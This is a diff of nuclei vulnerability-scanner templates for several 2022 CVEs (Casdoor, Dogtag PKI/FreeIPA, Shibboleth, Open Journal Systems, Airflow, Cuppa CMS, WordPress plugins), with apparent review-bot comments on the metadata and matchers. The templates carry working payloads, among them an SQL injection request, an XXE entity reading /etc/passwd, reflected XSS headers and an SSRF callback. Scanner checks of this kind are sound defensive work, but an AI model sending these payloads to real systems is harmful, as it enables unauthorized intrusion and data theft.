+ epss-score: 0.45887 + epss-percentile: 0.97086 + cpe: cpe:2.3:a:apache:shenyu:2.4.0:*:*:*:*:*:*:* + metadata: + max-request: 1 + vendor: apache + product: shenyu tags: cve,cve2022,shenyu,unauth,apache -requests: +http: - method: GET path: - "{{BaseURL}}/plugin" @@ -32,5 +45,4 @@ requests: - type: status status: - 200 - -# Enhanced by mp on 2022/03/08 +# digest: 490a0046304402207d4b54505896da78a61426b82a09c16b3004ec88eaafb319e9154fc6619cf00b0220133dc543f97181df2601ebbfe17254135ff340b3160efb33fad2e75fc4b49dc7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file 
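Review bot: The new `cpe` pins `apache:shenyu:2.4.0`, while the description on the same hunk says the issue affects both 2.4.0 and 2.4.1; the wildcard form the other templates in this commit use, `cpe: cpe:2.3:a:apache:shenyu:*:*:*:*:*:*:*:*`, or a comment noting why only 2.4.0 is listed, would avoid the template being filtered out for 2.4.1 hosts by CPE-based tooling. The severity change to critical is backed by the newly added CVSS 9.1 vector, so that part is consistent.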
diff --git a/nuclei-templates/CVE-2022/CVE-2022-24124.yaml b/nuclei-templates/CVE-2022/CVE-2022-24124.yaml
new file mode 100644
index 0000000000..dfd0bce904
--- /dev/null
+++ b/nuclei-templates/CVE-2022/CVE-2022-24124.yaml
@@ -0,0 +1,50 @@ +id: CVE-2022-24124 + +info: + name: Casdoor 1.13.0 - Unauthenticated SQL Injection + author: cckuailong + severity: high + description: Casdoor version 1.13.0 suffers from a remote unauthenticated SQL injection vulnerability via the query API in Casdoor before 1.13.1 related to the field and value parameters, as demonstrated by api/get-organizations. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized accessand data leakage. + remediation: | + Upgrade to a patched version of Casdoor or apply the necessary security patches to mitigate the SQL injection vulnerability. + reference: + - https://packetstormsecurity.com/files/166163/Casdoor-1.13.0-SQL-Injection.html + - https://www.exploit-db.com/exploits/50792 + - https://github.com/cckuailong/reapoc/tree/main/2022/CVE-2022-24124/vultarget + - https://nvd.nist.gov/vuln/detail/CVE-2022-24124 + - https://github.com/casdoor/casdoor/compare/v1.13.0...v1.13.1 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.5 + cve-id: CVE-2022-24124 + cwe-id: CWE-89 + epss-score: 0.07543 + epss-percentile: 0.93981 + cpe: cpe:2.3:a:casbin:casdoor:*:*:*:*:*:*:*:* + metadata: + max-request: 1 + vendor: casbin + product: "casdoor" + shodan-query: http.title:"Casdoor" + tags: cve,cve2022,sqli,unauth,packetstorm,edb,casdoor,casbin + +http: + - method: GET + path: + - "{{BaseURL}}/api/get-organizations?p=123&pageSize=123&value=cfx&sortField=&sortOrder=&field=updatexml(1,version(),1)" + + matchers-condition: and + matchers: + - type: regex + part: body + regex: + - "XPATH syntax error.*'" + - "casdoor" + condition: and + + - type: status + status: + - 200 +# digest: 4b0a00483046022100ba5ebd65a068d08aa8a9fb4c512f59baa665b2cbe8fa4e25a66a92104f27f415022100d66fba2ed1e2304f9c437470604cb22840501aada5cd30a98bf5d9811b2b07e4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file 
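Review bot: The `impact:` block has a typo, `accessand`, which should read `unauthorized access and data leakage.`; the description also states the version twice (`Casdoor version 1.13.0 ... in Casdoor before 1.13.1`) and could be reduced to a single range. `product: "casdoor"` is quoted while `vendor: casbin` is not — sibling templates in this commit leave both bare, so `product: casdoor` would match. The matcher pair (error regex plus `casdoor` in the body, `condition: and`) is a reasonable guard against generic XPATH error pages from other products.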
diff --git a/nuclei-templates/CVE-2022/CVE-2022-24129.yaml b/nuclei-templates/CVE-2022/CVE-2022-24129.yaml index ae129fe8d2..073b046241 100644 --- a/nuclei-templates/CVE-2022/CVE-2022-24129.yaml +++ b/nuclei-templates/CVE-2022/CVE-2022-24129.yaml 
@@ -1,49 +1,31 @@ id: CVE-2022-24129 - info: - name: Shibboleth OIDC OP <3.0.4 - Server-Side Request Forgery + name: Shibboleth OIDC OP plugin <3.0.4 - Server-Side Request Forgery author: 0x_Akoko severity: high - description: The Shibboleth Identity Provider OIDC OP plugin before 3.0.4 is vulnerable to server-side request forgery (SSRF) due to insufficient restriction of the request_uri parameter, which allows attackers to interact with arbitrary third-party HTTP services. - impact: | - An attacker can exploit this vulnerability to send crafted requests, potentially leading to unauthorized access to internal resources or information disclosure. - remediation: | - Upgrade to Shibboleth OIDC OP version 3.0.4 or later to mitigate the vulnerability. + description: The OIDC OP plugin before 3.0.4 for Shibboleth Identity Provider allows server-side request forgery (SSRF) due to insufficient restriction of the request_uri parameter. This allows attackers to interact with arbitrary third-party HTTP services. 
reference: - https://github.com/sbaresearch/advisories/tree/public/2022/SBA-ADV-20220127-01_Shibboleth_IdP_OIDC_OP_Plugin_SSRF - https://shibboleth.atlassian.net/wiki/spaces/IDPPLUGINS/pages/1376878976/OIDC+OP - - http://shibboleth.net/community/advisories/ - https://nvd.nist.gov/vuln/detail/CVE-2022-24129 - - http://shibboleth.net/community/advisories/secadv_20220131.txt + - http://shibboleth.net/community/advisories/ classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:H/A:N cvss-score: 8.2 cve-id: CVE-2022-24129 cwe-id: CWE-918 - epss-score: 0.00647 - epss-percentile: 0.77074 - cpe: cpe:2.3:a:shibboleth:oidc_op:*:*:*:*:*:identity_provider:*:* - metadata: - max-request: 1 - vendor: shibboleth - product: oidc_op - framework: identity_provider - tags: cve,cve2022,ssrf,oidc,shibboleth,identity_provider - -http: + tags: cve,cve2022,ssrf,oidc,shibboleth +requests: - method: GET path: - '{{BaseURL}}/idp/profile/oidc/authorize?client_id=demo_rp&request_uri=https://{{interactsh-url}}' - matchers-condition: and matchers: - type: word part: interactsh_protocol # Confirms the HTTP Interaction words: - "http" - - type: word part: interactsh_request words: - "ShibbolethIdp" -# digest: 4a0a004730450221008f7628cf3482df6bb5f6dc923c39a4fd651c4428bbb09c0f117f6b32b15940e402206af2dfa7231ae6a440e9440cc05d63f828a884006f109b865c5046f61b0b8cb6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2022/CVE-2022-2414.yaml b/nuclei-templates/CVE-2022/CVE-2022-2414.yaml new file mode 100644 index 0000000000..0f72b8b9b3 --- /dev/null +++ b/nuclei-templates/CVE-2022/CVE-2022-2414.yaml 
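Review bot: The new side drops `matchers-condition: and`, and with two `word` matchers nuclei falls back to OR, so the template now fires on any HTTP interaction recorded by interactsh even when the `ShibbolethIdp` request marker is absent — a false-positive regression. The hunk also runs against the rest of this commit: `http:` becomes `requests:` (the CVE-2022-23944, CVE-2022-24288 and CVE-2022-2467 hunks migrate `requests:` to `http:`), and the `impact`, `remediation`, `epss`, `cpe`, `metadata` and `# digest:` entries are removed, which reads like an older copy overwriting the maintained one. Keep `matchers-condition: and` and `http:`, and confirm the intended base before merging.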
@@ -0,0 +1,68 @@ +id: CVE-2022-2414 + +info: + name: FreeIPA - XML Entity Injection + author: DhiyaneshDk + severity: high + description: | + Access to external entities when parsing XML documents can lead to XML external entity (XXE) attacks. This flaw allows a remote attacker to potentially retrieve the content of arbitrary files by sending specially crafted HTTP requests. + impact: | + An attacker can exploit this vulnerability to gain unauthorized access to sensitive information stored on the server. + remediation: | + Apply the latest security patches and updates provided by the vendor to fix the XML Entity Injection vulnerability in FreeIPA. + reference: + - https://github.com/PeiQi0/PeiQi-WIKI-Book/blob/main/docs/wiki/webapp/Dogtag/Dogtag%20PKI%20XML%E5%AE%9E%E4%BD%93%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E%20CVE-2022-2414.md + - https://nvd.nist.gov/vuln/detail/CVE-2022-2414 + - https://github.com/dogtagpki/pki/pull/4021 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.5 + cve-id: CVE-2022-2414 + cwe-id: CWE-611 + epss-score: 0.01256 + epss-percentile: 0.84092 + cpe: cpe:2.3:a:dogtagpki:dogtagpki:10.5.18:*:*:*:*:*:*:* + metadata: + verified: true + max-request: 1 + vendor: dogtagpki + product: dogtagpki + shodan-query: title:"Identity Management" html:"FreeIPA" + fofa-query: title="Identity Management" + tags: cve,cve2022,dogtag,freeipa,xxe,dogtagpki + +http: + - raw: + - | + POST /ca/rest/certrequests HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/xml + + <!--?xml version="1.0" ?--> + <!DOCTYPE replace [<!ENTITY ent SYSTEM "file:///etc/passwd"> ]> + <CertEnrollmentRequest> + <Attributes/> + <ProfileID>&ent;</ProfileID> + </CertEnrollmentRequest> + + matchers-condition: and + matchers: + - type: regex + part: body + regex: + - "root:.*:0:0:" + + - type: word + part: body + words: + - "PKIException" + + - type: word + part: header + words: + - "application/xml" + + - type: status + status: + - 400 +# 
digest: 490a0046304402203e01a48643ddc4111a52d8b34ca90c1d803678990761a21ea7e52dbdcf384f87022053892bd3048fc94077b0f1d151dfade945c5ee5c9fa857c5d0203eca2a47d1cf:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2022/CVE-2022-24181.yaml b/nuclei-templates/CVE-2022/CVE-2022-24181.yaml index e4d4fbe5a6..706599f0a0 100644 --- a/nuclei-templates/CVE-2022/CVE-2022-24181.yaml +++ b/nuclei-templates/CVE-2022/CVE-2022-24181.yaml @@ -1,46 +1,39 @@ id: CVE-2022-24181 - info: - name: PKP Open Journal Systems 2.4.8-3.3 - Cross-Site Scripting + name: PKP Open Journals System 3.3 - Cross-Site Scripting (XSS) author: lucasljm2001,ekrause severity: medium description: | - PKP Open Journal Systems 2.4.8 to 3.3 contains a cross-site scripting vulnerability which allows remote attackers to inject arbitrary code via the X-Forwarded-Host Header. + Detects an XSS vulnerability in Open Journals System. reference: - https://www.exploit-db.com/exploits/50881 - https://github.com/pkp/pkp-lib/issues/7649 - https://youtu.be/v8-9evO2oVg + - https://cve.mitre.org/cgi-bin/cvename.cgi?name=2022-24181 - https://nvd.nist.gov/vuln/detail/cve-2022-24181 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2022-24181 - cwe-id: CWE-79 metadata: - verified: "true" - tags: cve,cve2022,xss,oss,pkp-lib,edb - + verified: true + tags: cve,cve2022,xss,oss,pkp-lib requests: - raw: - | GET /iupjournals/index.php/esj HTTP/2 Host: {{Hostname}} X-Forwarded-Host: foo"><script>alert(document.domain)</script><x=".com - matchers-condition: and matchers: - type: word part: body words: - '<script>alert(document.domain)</script><x=".com/iupjournals' - - type: word part: header words: - text/html - - type: status status: - 200 - -# Enhanced by mp on 2022/09/14 diff --git a/nuclei-templates/CVE-2022/CVE-2022-24223.yaml b/nuclei-templates/CVE-2022/CVE-2022-24223.yaml index 494584ebc4..50d11c14b2 100644 
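Review bot: `name: FreeIPA - XML Entity Injection` and the `freeipa` tag identify the wrong component: the `cpe`, `vendor`/`product` and the fixing reference (dogtagpki/pki pull 4021) all point at Dogtag PKI, which FreeIPA bundles. A name such as `name: Dogtag PKI (FreeIPA) - XML External Entity Injection` would keep both searchable. The remediation is generic ("Apply the latest security patches"); if the fixed Dogtag release is known it should be named, otherwise cite the linked pull request. The `root:.*:0:0:` body regex combined with `PKIException` and status 400 is a fairly specific signal, so false positives are unlikely.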
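Review bot: The new side removes `matchers-condition: and`, leaving a body-word, header-word and status matcher that default to OR, so any 200 `text/html` response will now match and the reflected-header check no longer gates the result. The description is also replaced with the one-liner `Detects an XSS vulnerability in Open Journals System.`, losing the affected range (2.4.8 to 3.3) and the `X-Forwarded-Host` vector, and `cwe-id: CWE-79` is dropped. The added reference `https://cve.mitre.org/cgi-bin/cvename.cgi?name=2022-24181` appears to be missing the `CVE-` prefix in the `name` parameter. Restore `matchers-condition: and` and `cwe-id: CWE-79` and keep the earlier description.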
--- a/nuclei-templates/CVE-2022/CVE-2022-24223.yaml +++ b/nuclei-templates/CVE-2022/CVE-2022-24223.yaml @@ -6,25 +6,29 @@ info: severity: critical description: | AtomCMS v2.0 was discovered to contain a SQL injection vulnerability via /admin/login.php. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data leakage, or data manipulation. remediation: Fixed in version Atom CMS v2.1 reference: - https://packetstormsecurity.com/files/165922/Atom-CMS-2.0-SQL-Injection.html - https://github.com/thedigicraft/Atom.CMS/issues/255 - https://nvd.nist.gov/vuln/detail/CVE-2022-24223 + - https://github.com/ARPSyndicate/cvemon + - https://github.com/Enes4xd/Enes4xd classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2022-24223 cwe-id: CWE-89 - epss-score: 0.11255 - epss-percentile: 0.94623 + epss-score: 0.27442 + epss-percentile: 0.96689 cpe: cpe:2.3:a:thedigitalcraft:atomcms:2.0:*:*:*:*:*:*:* metadata: verified: true max-request: 1 vendor: thedigitalcraft product: atomcms - tags: packetstorm,cve,cve2022,sqli,atom,cms + tags: cve,cve2022,packetstorm,sqli,atom,cms,thedigitalcraft http: - raw: @@ -43,4 +47,4 @@ http: - 'status_code == 200' - 'contains(body, "Admin Login") && contains(body, "Atom.SaveOnBlur")' condition: and -# digest: 490a0046304402205f8b443e315b68277a1f55348b4617a8163179aea1c77eb7cea613885c98ab510220023f789ac98e0cbd6a4cc197d454dd415e1c6dc112af986d4e14f33d1e0f0e54:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100b30222427f9ffd0bdc3e9c961d2d43e58bcaaa1c01926b6710eb7a2c2eec31a2022100f35d98eab9372172d960a8d2af85b2b0160b92776eb2f797098acd5ee6cd32fd:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2022/CVE-2022-24264.yaml b/nuclei-templates/CVE-2022/CVE-2022-24264.yaml index 8eded7fbf2..8b01b0a101 100644 
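Review bot: The two added references, `https://github.com/ARPSyndicate/cvemon` and `https://github.com/Enes4xd/Enes4xd`, are repository roots of aggregator or personal projects rather than pages about CVE-2022-24223, so they do not help a reader verify the finding. The same pattern appears in the CVE-2022-24264, CVE-2022-24265, CVE-2022-24266 and CVE-2022-24288 hunks (cvemon, kenzer-templates, Nguyen-Trung-Kien/CVE-1, oxf5/CVE, my_cve_and_bounty_poc). Either link the CVE-specific path inside those repositories or drop them and keep the packetstorm, issue and NVD links. The EPSS and impact updates themselves look fine.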
--- a/nuclei-templates/CVE-2022/CVE-2022-24264.yaml +++ b/nuclei-templates/CVE-2022/CVE-2022-24264.yaml @@ -6,26 +6,30 @@ info: severity: high description: | Cuppa CMS v1.0 was discovered to contain a SQL injection vulnerability in /administrator/components/table_manager/ via the search_word parameter. + impact: | + Successful exploitation of this vulnerability can lead to unauthorized access, data leakage, and potential compromise of the entire CMS system. remediation: | Upgrade to the latest version of Cuppa CMS or apply the provided patch to fix the SQL injection vulnerability. reference: - https://github.com/CuppaCMS/CuppaCMS - https://nvd.nist.gov/vuln/detail/CVE-2022-24264 - https://github.com/truonghuuphuc/CVE + - https://github.com/ARPSyndicate/cvemon + - https://github.com/Nguyen-Trung-Kien/CVE-1 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cve-id: CVE-2022-24264 cwe-id: CWE-89 - epss-score: 0.05971 - epss-percentile: 0.92674 + epss-score: 0.04717 + epss-percentile: 0.91844 cpe: cpe:2.3:a:cuppacms:cuppacms:1.0:*:*:*:*:*:*:* metadata: verified: true max-request: 2 vendor: cuppacms product: cuppacms - tags: cve,cve2022,sqli,cuppa,authenticated + tags: cve,cve2022,sqli,cuppa,authenticated,cuppacms variables: num: '999999999' @@ -61,4 +65,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100eed5751f32f7234c1376063a76e8fe0dbaf63926d0e5818d25a634b906064359022012a56ff255ca0fc38aff17072282647964631f9307428f4966b8578495c576d8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a004630440220736b8973074f85183b4bb813328ec1a114f2ad79d996268f1acae2f5b6faae9f02202b55ebe13f22c216f153f5fd564e50bcbd4499dd04d0e794c9030858c860bed1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2022/CVE-2022-24265.yaml b/nuclei-templates/CVE-2022/CVE-2022-24265.yaml index fd9d889d5e..9fb0696a2e 100644 --- a/nuclei-templates/CVE-2022/CVE-2022-24265.yaml 
+++ b/nuclei-templates/CVE-2022/CVE-2022-24265.yaml @@ -6,26 +6,30 @@ info: severity: high description: | Cuppa CMS v1.0 was discovered to contain a SQL injection vulnerability in /administrator/components/menu/ via the path=component/menu/&menu_filter=3 parameter. + impact: | + Successful exploitation of this vulnerability can lead to unauthorized access, data leakage, and potential compromise of the entire CMS system. remediation: | Upgrade to the latest version of Cuppa CMS or apply the provided patch to fix the SQL injection vulnerability. reference: - https://github.com/CuppaCMS/CuppaCMS - https://nvd.nist.gov/vuln/detail/CVE-2022-24265 - https://github.com/truonghuuphuc/CVE + - https://github.com/Nguyen-Trung-Kien/CVE-1 + - https://github.com/oxf5/CVE classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cve-id: CVE-2022-24265 cwe-id: CWE-89 - epss-score: 0.05971 - epss-percentile: 0.92674 + epss-score: 0.05054 + epss-percentile: 0.92726 cpe: cpe:2.3:a:cuppacms:cuppacms:1.0:*:*:*:*:*:*:* metadata: verified: true max-request: 2 vendor: cuppacms product: cuppacms - tags: cve,cve2022,sqli,cuppa,authenticated + tags: cve2022,cve,sqli,cuppa,authenticated,cuppacms http: - raw: @@ -51,4 +55,4 @@ http: - 'contains(content_type_2, "text/html")' - 'contains(body_2, "menu/html/edit.php")' condition: and -# digest: 4a0a0047304502202a593c7265dc80c67bf4e733ca6c19612b58761d042d7cc0828ee0eb0ce1cfdc022100c49f9ca5398a477116580ff011e8774a9f75e5f45aa63c1d448004aced91ddaa:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100ef926993f56df3d6024e815c648f1444430a5c25d5001fa418f66bc26b3f9961022100c18f80d30dbafc9c6af9bcadca69526a5ee1ba114d5c6ec9aa22599cf01ebcc3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2022/CVE-2022-24266.yaml b/nuclei-templates/CVE-2022/CVE-2022-24266.yaml index 413fa9df34..c8fabc2f2b 100644 --- a/nuclei-templates/CVE-2022/CVE-2022-24266.yaml 
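Review bot: The rewritten `tags: cve2022,cve,sqli,cuppa,authenticated,cuppacms` puts `cve2022` ahead of `cve`, whereas the sibling Cuppa templates in this commit (CVE-2022-24264, CVE-2022-24266) and the rest of the repository use `cve,cve2022,...`; the CVE-2022-24706 hunk has the same reordering (`cve2022,network,cve,...`). Tag order does not change matching, but the inconsistency makes grep and review harder. Use `tags: cve,cve2022,sqli,cuppa,authenticated,cuppacms`.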
+++ b/nuclei-templates/CVE-2022/CVE-2022-24266.yaml @@ -6,6 +6,8 @@ info: severity: high description: | Cuppa CMS v1.0 was discovered to contain a SQL injection vulnerability in /administrator/components/table_manager/ via the order_by parameter. + impact: | + Successful exploitation of this vulnerability can lead to unauthorized access, data leakage, and potential compromise of the entire system. remediation: | Upgrade to the latest version of Cuppa CMS or apply the provided patch to fix the SQL injection vulnerability. reference: @@ -13,20 +15,21 @@ info: - https://nvd.nist.gov/vuln/detail/CVE-2022-24266 - https://github.com/CuppaCMS/CuppaCMS/issues/17 - https://github.com/truonghuuphuc/CVE + - https://github.com/ARPSyndicate/cvemon classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cve-id: CVE-2022-24266 cwe-id: CWE-89 - epss-score: 0.04048 - epss-percentile: 0.91144 + epss-score: 0.03412 + epss-percentile: 0.91229 cpe: cpe:2.3:a:cuppacms:cuppacms:1.0:*:*:*:*:*:*:* metadata: verified: true max-request: 2 vendor: cuppacms product: cuppacms - tags: cve,cve2022,sqli,cuppa,authenticated + tags: cve,cve2022,sqli,cuppa,authenticated,cuppacms http: - raw: @@ -52,4 +55,4 @@ http: - 'contains(content_type_2, "text/html")' - 'contains(body_2, "list_admin_table")' condition: and -# digest: 490a0046304402200f5a7c0f4e0129764d452426c3380fea142d9215094aec1ac124cb5805cc69d2022007b4ffdececfeaaa14e6051ce385dc58ce4a3ea935f65c10376013b35805ba4f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022001af995ffcc1fd2b4e63125802fda7806a8bda33d6cde6d71b11627458173c3b022100c28812270e59082397fb8f39eae1d431ad18f591da96014bfaf17017f0691a1f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2022/CVE-2022-24288.yaml b/nuclei-templates/CVE-2022/CVE-2022-24288.yaml index 859598f067..8aa55a92ad 100644 --- a/nuclei-templates/CVE-2022/CVE-2022-24288.yaml 
+++ b/nuclei-templates/CVE-2022/CVE-2022-24288.yaml @@ -3,21 +3,35 @@ id: CVE-2022-24288 info: name: Apache Airflow OS Command Injection author: xeldax - severity: critical + severity: high description: Apache Airflow prior to version 2.2.4 is vulnerable to OS command injection attacks because some example DAGs do not properly sanitize user-provided parameters, making them susceptible to OS Command Injection from the web UI. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary commands on the target system. + remediation: | + Apply the latest security patches or upgrade to a patched version of Apache Airflow. reference: - https://github.com/advisories/GHSA-3v7g-4pg3-7r6j - https://nvd.nist.gov/vuln/detail/CVE-2022-24288 + - https://lists.apache.org/thread/dbw5ozcmr0h0lhs0yjph7xdc64oht23t + - https://github.com/ARPSyndicate/kenzer-templates + - https://github.com/Hax0rG1rl/my_cve_and_bounty_poc classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H cvss-score: 8.8 cve-id: CVE-2022-24288 cwe-id: CWE-78 + epss-score: 0.81676 + epss-percentile: 0.98279 + cpe: cpe:2.3:a:apache:airflow:*:*:*:*:*:*:*:* metadata: - shodan-query: title:"Airflow - DAGs" - tags: cve,cve2022,airflow,rce + verified: true + max-request: 2 + vendor: apache + product: airflow + shodan-query: title:"Airflow - DAGs" || http.html:"Apache Airflow" + tags: cve,cve2022,airflow,rce,apache -requests: +http: - method: GET path: - "{{BaseURL}}/admin/airflow/code?root=&dag_id=example_passing_params_via_test_command" @@ -28,5 +42,4 @@ requests: - type: word words: - 'foo was passed in via Airflow CLI Test command with value {{ params.foo }}' # Works with unauthenticated airflow instance - -# Enhanced by mp on 2022/03/23 +# digest: 4a0a00473045022014c9c4b7a70a69fdf977286bc7aabdd64059d785bff999619c167ab3393355120221008cdca1281271d3ca5ea873f99082667f92c1aff3d825665947813512c6113339:922c64590222798bb761d5b6d8e72950 \ No newline at end of file 
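Review bot: `max-request: 2` is added under `metadata`, but only a single GET path is visible in this hunk; if the template has no second request outside the hunk, the count should be `max-request: 1`. The match string `foo was passed in via Airflow CLI Test command with value {{ params.foo }}` appears to be the source text of the bundled example DAG as rendered by the code view, so the template identifies an exposed code endpoint with that DAG loaded rather than the vulnerable version itself; if 2.2.4 kept that line, patched instances will also match, which is worth stating in the description or in the existing comment. The severity change to high is consistent with the 8.8 score of the existing PR:L vector. The remaining body of the `http` entry lies outside the hunk.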
diff --git a/nuclei-templates/CVE-2022/CVE-2022-24384.yaml b/nuclei-templates/CVE-2022/CVE-2022-24384.yaml index d51d6b2175..735634f0ff 100644 --- a/nuclei-templates/CVE-2022/CVE-2022-24384.yaml +++ b/nuclei-templates/CVE-2022/CVE-2022-24384.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | Cross-site Scripting (XSS) vulnerability in SmarterTools SmarterTrack This issue affects: SmarterTools SmarterTrack 100.0.8019.14010. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary script code in the context of the victim's browser, potentially leading to session hijacking, defacement, or theft of sensitive information. remediation: | Apply the latest security patches or updates provided by SmarterTools to fix this vulnerability. reference: @@ -17,7 +19,7 @@ info: cve-id: CVE-2022-24384 cwe-id: CWE-79 epss-score: 0.00084 - epss-percentile: 0.35175 + epss-percentile: 0.34937 cpe: cpe:2.3:a:smartertools:smartertrack:*:*:*:*:*:*:*:* metadata: verified: true @@ -25,7 +27,7 @@ info: vendor: smartertools product: smartertrack shodan-query: http.favicon.hash:1410071322 - tags: cve,cve2022,xss,smartertrack + tags: cve,cve2022,xss,smartertrack,smartertools http: - raw: @@ -39,4 +41,4 @@ http: - '"type":"error","text":"Unknown survey\"><img src=x onerror=alert(document.domain)>"' - 'smartertrack' condition: and -# digest: 4a0a00473045022100fedc95e8281bb0ec97eef7d4a08fdb99ac0d02493d606c80e5a838cb5d60b6b5022079ef3bbbeb93fadfcea2b04e75102dc75f7ebbcc6382aeadb8dc992021d87386:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100b4892f5c64f6232351379b197d1871d961f0b6c1bfe2c35aa9ec6b1fe287a6f202203f5de83f46a950369d103b2ff3e6f864c4508f0b7fbbef2ffdd5ae4281720fcc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2022/CVE-2022-2446.yaml b/nuclei-templates/CVE-2022/CVE-2022-2446.yaml new file mode 100644 index 0000000000..76d646cc38 --- /dev/null 
+++ b/nuclei-templates/CVE-2022/CVE-2022-2446.yaml @@ -0,0 +1,59 @@ +id: CVE-2022-2446 + +info: + name: > + WP Editor <= 1.2.9 - Authenticated (Admin+) PHAR Deserialization + author: topscoder + severity: low + description: > + The WP Editor plugin for WordPress is vulnerable to deserialization of untrusted input via the 'current_theme_root' parameter in versions up to, and including 1.2.9. This makes it possible for authenticated attackers with administrative privileges to call files using a PHAR wrapper that will deserialize and call arbitrary PHP Objects that can be used to perform a variety of malicious actions granted a POP chain is also present. It also requires that the attacker is successful in uploading a file with the serialized payload. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/f3555702-4427-4569-8fd6-f84113593e9d?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H + cvss-score: 7.2 + cve-id: CVE-2022-2446 + metadata: + fofa-query: "wp-content/plugins/wp-editor/" + google-query: inurl:"/wp-content/plugins/wp-editor/" + shodan-query: 'vuln:CVE-2022-2446' + tags: cve,wordpress,wp-plugin,wp-editor,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/wp-editor/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "wp-editor" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.2.9') \ No newline at end of file diff --git a/nuclei-templates/CVE-2022/CVE-2022-2462.yaml b/nuclei-templates/CVE-2022/CVE-2022-2462.yaml index 06a2632296..fe117426c4 100644 
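Review bot: `severity: low` contradicts the `cvss-score: 7.2` and the `PR:H ... C:H/I:H/A:H` vector in the same file, which score as high; one of the two should change, and the `low` entry in `tags` should follow the severity. The tags also lack `cve2022`, which every other CVE template in this commit carries, and there is no `cwe-id` (deserialization of untrusted data is CWE-502). Two extractors both named `version` run the same regex, one `internal`, which works but duplicates the pattern. Unlike the other templates here the file carries no `# digest:` line, so it may be treated as unsigned by nuclei's template signature check.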
--- a/nuclei-templates/CVE-2022/CVE-2022-2462.yaml +++ b/nuclei-templates/CVE-2022/CVE-2022-2462.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | WordPress Transposh plugin through is susceptible to information disclosure via the AJAX action tp_history, which is intended to return data about who has translated a text given by the token parameter. However, the plugin also returns the user's login name as part of the user_login attribute. If an anonymous user submits the translation, the user's IP address is returned. An attacker can leak the WordPress username of translators and potentially execute other unauthorized operations. + impact: | + An attacker can exploit this vulnerability to gain sensitive information from the target system. remediation: | Upgrade to the latest version of the WordPress Transposh plugin (>=1.0.8.2) to mitigate this vulnerability. reference: @@ -19,15 +21,15 @@ info: cvss-score: 5.3 cve-id: CVE-2022-2462 cwe-id: CWE-200 - epss-score: 0.01386 - epss-percentile: 0.84856 + epss-score: 0.02698 + epss-percentile: 0.90234 cpe: cpe:2.3:a:transposh:transposh_wordpress_translation:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 vendor: transposh product: transposh_wordpress_translation framework: wordpress - tags: cve,cve2022,wordpress,disclosure,wp-plugin,packetstorm + tags: cve,cve2022,wordpress,disclosure,wp-plugin,packetstorm,transposh http: - method: POST @@ -59,4 +61,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100844c29c078fedb5c83e77a4a6895a8271e1113f5bb3caeda17b2441fdf018b88022027e808036486d12c7140bdea046245fb14a2573755bcf50c14b294b845dca772:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502206c6ee70b9245c089a3f406d01f902c54a26c406fac6592650e59faa6311584fd022100a14c1a73652a9999f953fa755658caed5c22d516cf51b10d0c18cfc8ca40e2d1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file 
